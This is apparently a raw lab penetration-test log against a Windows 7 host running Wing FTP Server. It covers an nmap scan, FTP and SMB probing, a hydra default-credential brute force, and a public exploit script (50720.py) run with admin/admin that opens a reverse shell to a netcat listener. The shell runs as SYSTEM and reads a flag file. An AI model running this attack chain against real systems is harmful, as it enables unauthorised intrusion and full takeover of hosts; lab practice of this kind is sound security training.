nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.36
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 18:28 EST
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 53.85% done; ETC: 18:28 (0:00:14 remaining)
Nmap scan report for 10.11.1.36
Host is up (0.021s latency).
Not shown: 62919 closed tcp ports (reset), 2603 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Wing FTP Server
80/tcp   open  http         Wing FTP Server(Ferdi Bak)
|_http-server-header: Wing FTP Server(Ferdi Bak)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not found
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: application/octet-stream
|     Content-Length: 0
|     Connection: close
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.0 200 HTTP OK
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: text/html
|     Content-Length: 316
|     Connection: close
|     <noscript><center><H2>The web client requires that you have Javascript enabled on your browser.<br>If you're not sure how to do this, <a href='help_javascript.htm'>click here.</a></H2></center></noscript>
|_    <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='login.html';</script>
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1033/tcp open  msrpc        Microsoft Windows RPC
1034/tcp open  msrpc        Microsoft Windows RPC
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5466/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.0 200 HTTP OK
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: text/html
|     Content-Length: 338
|     Connection: close
|     <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='admin_login.html';</script>
|_    <noscript><center><H2>The administration interface requires that you have Javascript enabled on your browser. <br>If you're not sure how to do this, <a href='help_javascript.htm'>click here.</a> </H2></center></noscript>
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=2/10%Time=67AA8B9F%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,1D1,"HTTP/1\.0\x20200\x20HTTP\x20OK\r\nServer:\x20Wing\x20FTP
SF:\x20Server\(Ferdi\x20Bak\)\r\nCache-Control:\x20private\r\nContent-Type
SF::\x20text/html\r\nContent-Length:\x20316\r\nConnection:\x20close\r\n\r\
SF:n\n<noscript><center><H2>The\x20web\x20client\x20requires\x20that\x20yo
SF:u\x20have\x20Javascript\x20enabled\x20on\x20your\x20browser\.<br>If\x20
SF:you're\x20not\x20sure\x20how\x20to\x20do\x20this,\x20<a\x20href='help_j
SF:avascript\.htm'>click\x20here\.</a></H2></center></noscript>\n<meta\x20
SF:http-equiv='Content-Type'\x20content='text/html;\x20charset=utf-8'><scr
SF:ipt>top\.location='login\.html';</script>")%r(HTTPOptions,1D1,"HTTP/1\.
SF:0\x20200\x20HTTP\x20OK\r\nServer:\x20Wing\x20FTP\x20Server\(Ferdi\x20Ba
SF:k\)\r\nCache-Control:\x20private\r\nContent-Type:\x20text/html\r\nConte
SF:nt-Length:\x20316\r\nConnection:\x20close\r\n\r\n\n<noscript><center><H
SF:2>The\x20web\x20client\x20requires\x20that\x20you\x20have\x20Javascript
SF:\x20enabled\x20on\x20your\x20browser\.<br>If\x20you're\x20not\x20sure\x
SF:20how\x20to\x20do\x20this,\x20<a\x20href='help_javascript\.htm'>click\x
SF:20here\.</a></H2></center></noscript>\n<meta\x20http-equiv='Content-Typ
SF:e'\x20content='text/html;\x20charset=utf-8'><script>top\.location='logi
SF:n\.html';</script>")%r(RTSPRequest,1D1,"HTTP/1\.0\x20200\x20HTTP\x20OK\
SF:r\nServer:\x20Wing\x20FTP\x20Server\(Ferdi\x20Bak\)\r\nCache-Control:\x
SF:20private\r\nContent-Type:\x20text/html\r\nContent-Length:\x20316\r\nCo
SF:nnection:\x20close\r\n\r\n\n<noscript><center><H2>The\x20web\x20client\
SF:x20requires\x20that\x20you\x20have\x20Javascript\x20enabled\x20on\x20yo
SF:ur\x20browser\.<br>If\x20you're\x20not\x20sure\x20how\x20to\x20do\x20th
SF:is,\x20<a\x20href='help_javascript\.htm'>click\x20here\.</a></H2></cent
SF:er></noscript>\n<meta\x20http-equiv='Content-Type'\x20content='text/htm
SF:l;\x20charset=utf-8'><script>top\.location='login\.html';</script>")%r(
SF:FourOhFourRequest,A4,"HTTP/1\.0\x20404\x20Not\x20found\r\nServer:\x20Wi
SF:ng\x20FTP\x20Server\(Ferdi\x20Bak\)\r\nCache-Control:\x20private\r\nCon
SF:tent-Type:\x20application/octet-stream\r\nContent-Length:\x200\r\nConne
SF:ction:\x20close\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5466-TCP:V=7.94SVN%I=7%D=2/10%Time=67AA8B9F%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,1E7,"HTTP/1\.0\x20200\x20HTTP\x20OK\r\nServer:\x20Wing\x2
SF:0FTP\x20Server\(Ferdi\x20Bak\)\r\nCache-Control:\x20private\r\nContent-
SF:Type:\x20text/html\r\nContent-Length:\x20338\r\nConnection:\x20close\r\
SF:n\r\n<meta\x20http-equiv='Content-Type'\x20content='text/html;\x20chars
SF:et=utf-8'><script>top\.location='admin_login\.html';</script>\n\n<noscr
SF:ipt><center><H2>The\x20administration\x20interface\x20requires\x20that\
SF:x20you\x20have\x20Javascript\x20enabled\x20on\x20your\x20browser\.\x20<
SF:br>If\x20you're\x20not\x20sure\x20how\x20to\x20do\x20this,\x20<a\x20hre
SF:f='help_javascript\.htm'>click\x20here\.</a>\x20</H2></center></noscrip
SF:t>")%r(GetRequest,1E7,"HTTP/1\.0\x20200\x20HTTP\x20OK\r\nServer:\x20Win
SF:g\x20FTP\x20Server\(Ferdi\x20Bak\)\r\nCache-Control:\x20private\r\nCont
SF:ent-Type:\x20text/html\r\nContent-Length:\x20338\r\nConnection:\x20clos
SF:e\r\n\r\n<meta\x20http-equiv='Content-Type'\x20content='text/html;\x20c
SF:harset=utf-8'><script>top\.location='admin_login\.html';</script>\n\n<n
SF:oscript><center><H2>The\x20administration\x20interface\x20requires\x20t
SF:hat\x20you\x20have\x20Javascript\x20enabled\x20on\x20your\x20browser\.\
SF:x20<br>If\x20you're\x20not\x20sure\x20how\x20to\x20do\x20this,\x20<a\x2
SF:0href='help_javascript\.htm'>click\x20here\.</a>\x20</H2></center></nos
SF:cript>")%r(HTTPOptions,1E7,"HTTP/1\.0\x20200\x20HTTP\x20OK\r\nServer:\x
SF:20Wing\x20FTP\x20Server\(Ferdi\x20Bak\)\r\nCache-Control:\x20private\r\
SF:nContent-Type:\x20text/html\r\nContent-Length:\x20338\r\nConnection:\x2
SF:0close\r\n\r\n<meta\x20http-equiv='Content-Type'\x20content='text/html;
SF:\x20charset=utf-8'><script>top\.location='admin_login\.html';</script>\
SF:n\n<noscript><center><H2>The\x20administration\x20interface\x20requires
SF:\x20that\x20you\x20have\x20Javascript\x20enabled\x20on\x20your\x20brows
SF:er\.\x20<br>If\x20you're\x20not\x20sure\x20how\x20to\x20do\x20this,\x20
SF:<a\x20href='help_javascript\.htm'>click\x20here\.</a>\x20</H2></center>
SF:</noscript>")%r(RTSPRequest,1E7,"HTTP/1\.0\x20200\x20HTTP\x20OK\r\nServ
SF:er:\x20Wing\x20FTP\x20Server\(Ferdi\x20Bak\)\r\nCache-Control:\x20priva
SF:te\r\nContent-Type:\x20text/html\r\nContent-Length:\x20338\r\nConnectio
SF:n:\x20close\r\n\r\n<meta\x20http-equiv='Content-Type'\x20content='text/
SF:html;\x20charset=utf-8'><script>top\.location='admin_login\.html';</scr
SF:ipt>\n\n<noscript><center><H2>The\x20administration\x20interface\x20req
SF:uires\x20that\x20you\x20have\x20Javascript\x20enabled\x20on\x20your\x20
SF:browser\.\x20<br>If\x20you're\x20not\x20sure\x20how\x20to\x20do\x20this
SF:,\x20<a\x20href='help_javascript\.htm'>click\x20here\.</a>\x20</H2></ce
SF:nter></noscript>");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=21%CT=1%CU=42109%PV=Y%DS=2%DC=I%G=Y%TM=67AA
OS:8C41%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=100%TI=I%TS=7)SEQ(SP=FB%G
OS:CD=1%ISR=FF%TI=I%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%
OS:O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4
OS:=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R
OS:=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)
 
Network Distance: 2 hops
Service Info: Host: STEVEN-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: mean: 2h40m01s, deviation: 4h37m07s, median: 1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: STEVEN-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ac:b8:6e (VMware)
| smb2-time: 
|   date: 2025-02-10T23:30:45
|_  start_date: 2025-02-10T22:26:25
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: steven-PC
|   NetBIOS computer name: STEVEN-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-02-10T15:30:44-08:00
 
TRACEROUTE
HOP RTT      ADDRESS
1   21.10 ms 10.11.1.36
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.71 seconds
 

21/tcp   open  ftp          Wing FTP Server

ftp anonymou@10.11.1.36
Connected to 10.11.1.36.
220 Wing FTP Server ready...
331 Password required for anonymou
Password: 
530 Not logged in,password error.
ftp: Login failed
ftp> ls
530 Please log in with USER and PASS first.
530 Please log in with USER and PASS first.
ftp: Can't bind for data connection: Address already in use
ftp> exit
530 Please log in with USER and PASS first.

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.11.1.36
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-10 18:36:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.11.1.36:21/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-10 18:36:06

80/tcp   open  http         Wing FTP Server(Ferdi Bak)
|_http-server-header: Wing FTP Server(Ferdi Bak)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not found
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: application/octet-stream
|     Content-Length: 0
|     Connection: close
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.0 200 HTTP OK
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: text/html
|     Content-Length: 316
|     Connection: close
|     <noscript><center><H2>The web client requires that you have Javascript enabled on your browser.<br>If you're not sure how to do this, <a href='help_javascript.htm'>click here.</a></H2></center></noscript>
|_    <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='login.html';</script>
|_http-title: Site doesn't have a title (text/html).

445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

smbclient -N -L \\\\10.11.1.36   
Anonymous login successful
 
	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.11.1.36 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

5466/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.0 200 HTTP OK
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: text/html
|     Content-Length: 338
|     Connection: close
|     <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='admin_login.html';</script>
|_    <noscript><center><H2>The administration interface requires that you have Javascript enabled on your browser. <br>If you're not sure how to do this, <a href='help_javascript.htm'>click here.</a> </H2></center></noscript>

mv /home/sake/Downloads/50720.py ./

python3 50720.py 10.11.1.36 5466 172.16.1.1 1234 admin admin
 
          .--.
         / ,~a`-,
         \ \_.-"`
          ) (        __      __ .__            ____      __________ _________  ___________
        ,/ ."\      /  \    /  \|__|  ____    / ___\     \______   \\_   ___ \ \_   _____/
       /  (  |      \   \/\/   /|  | /    \  / /_/  >     |       _//    \  \/  |    __)_
      /   )  ;       \        / |  ||   |  \ \___  /      |    |   \\     \____ |        \
     /   /  /         \__/\  /  |__||___|  //_____/       |____|_  / \______  //_______  /
   ,/_."` /`               \/            \/                      \/         \/         \/
    /_/\ |___
       `~~~~~`
          
Login successful - Cookie: UIDADMIN=83a189e6...
The payload has been sent. Check your listener.

nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.36] 1084
whoami
nt authority\system

nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.36] 1084
whoami
nt authority\system
PS C:\Windows\system32> cd C:\users\administrator
PS C:\users\administrator> ls
 
 
    Directory: C:\users\administrator
 
 
Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d-r--         5/22/2017   3:22 AM            Contacts                          
d-r--         5/22/2017   3:23 AM            Desktop                           
d-r--         5/22/2017   3:22 AM            Documents                         
d-r--         5/22/2017   3:22 AM            Downloads                         
d-r--         5/22/2017   3:22 AM            Favorites                         
d-r--         5/22/2017   3:22 AM            Links                             
d-r--         5/22/2017   3:22 AM            Music                             
d-r--         5/22/2017   3:22 AM            Pictures                          
d-r--         5/22/2017   3:22 AM            Saved Games                       
d-r--         5/22/2017   3:22 AM            Searches                          
d-r--         5/22/2017   3:22 AM            Videos                            
 
 
PS C:\users\administrator> cd Desktop
PS C:\users\administrator\Desktop> ls
 
 
    Directory: C:\users\administrator\Desktop
 
 
Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-a---         5/22/2017   3:24 AM         20 key.txt.txt                       
 
 
PS C:\users\administrator\Desktop> cat key.txt.txt
t70m5jaco2zy9vhqlb6s
PS C:\users\administrator\Desktop> whoami
nt authority\system
PS C:\users\administrator\Desktop> date
 
Monday, February 10, 2025 3:50:58 PM